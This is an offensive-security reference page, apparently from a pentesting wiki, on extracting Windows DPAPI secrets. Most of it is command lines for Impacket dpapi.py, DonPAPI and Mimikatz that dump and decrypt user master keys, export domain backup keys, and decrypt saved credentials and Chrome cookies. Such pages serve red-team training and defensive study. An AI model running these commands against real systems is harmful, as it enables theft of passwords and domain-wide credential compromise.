DPAPI secrets
MITRE ATT&CKโ„ข Sub-technique T1555.003

Theory

The DPAPI (Data Protection API) is an internal component in the Windows system. It allows various applications to store sensitive data (e.g. passwords). The data are stored in the users directory and are secured by user-specific master keys derived from the users password. They are usually located at:
1
C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID
Copied!
Application like Google Chrome, Outlook, Internet Explorer, Skype use the DPAPI. Windows also uses that API for sensitive information like Wi-Fi passwords, certificates, RDP connection passwords, and many more.
Below are common paths of hidden files that usually contain DPAPI-protected data.
1
C:\Users\$USER\AppData\Local\Microsoft\Credentials\
2
C:\Users\$USER\AppData\Roaming\Microsoft\Credentials\
Copied!

Practice

UNIX-like
Windows
From UNIX-like systems, DPAPI-data can be manipulated (mainly offline) with tools like dpapick (Python), dpapilab (Python), Impacket's dpapi.py and secretsdump.py (Python).
1
# (not tested) Decrypt a master key
2
dpapi.py masterkey -file "/path/to/masterkey_file" -sid $USER_SID -password $MASTERKEY_PASSWORD
3
โ€‹
4
# (not tested) Obtain the backup keys & use it to decrypt a master key
5
dpapi.py backupkeys -t $DOMAIN/$USER:$PASSWORD@$TARGET
6
dpapi.py masterkey -file "/path/to/masterkey_file" -pvk "/path/to/backup_key.pvk"
7
โ€‹
8
# (not tested) Decrypt DPAPI-protected data using a master key
9
dpapi.py credential -file "/path/to/protected_file" -key $MASTERKEY
Copied!
โ€‹DonPAPI (Python) can also be used to remotely extract a user's DPAPI secrets more easily. It supports pass-the-hash, pass-the-ticket and so on.
1
DonPAPI.py 'domain'/'username':'password'@<'targetName' or 'address/mask'>
Copied!
On Windows systems Mimikatz (C) can be used to extract, decrypt or use specific master keys using specified passwords or given sufficient privileges.
1
# Extract and decrypt a master key
2
dpapi::masterkey /in:"C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID" /sid:$SID /password:$PASSWORD /protected
3
โ€‹
4
# Extract and decrypt all master keys
5
sekurlsa::dpapi
6
โ€‹
7
# Extract the backup keys & use it to decrypt a master key
8
lsadump::backupkeys /system:$DOMAIN_CONTROLLER /export
9
dpapi::masterkey /in:"C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID" /pvk:$BACKUP_KEY_EXPORT_PVK
10
โ€‹
11
# Decrypt Chrome data
12
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies"
13
โ€‹
14
# Decrypt DPAPI-protected data using a master key
15
dpapi::cred /in:"C:\path\to\encrypted\file" /masterkey:$MASTERKEY
Copied!

Resources

DPAPI - Extracting Passwords
HackTricks
Last modified 12d ago
Copy link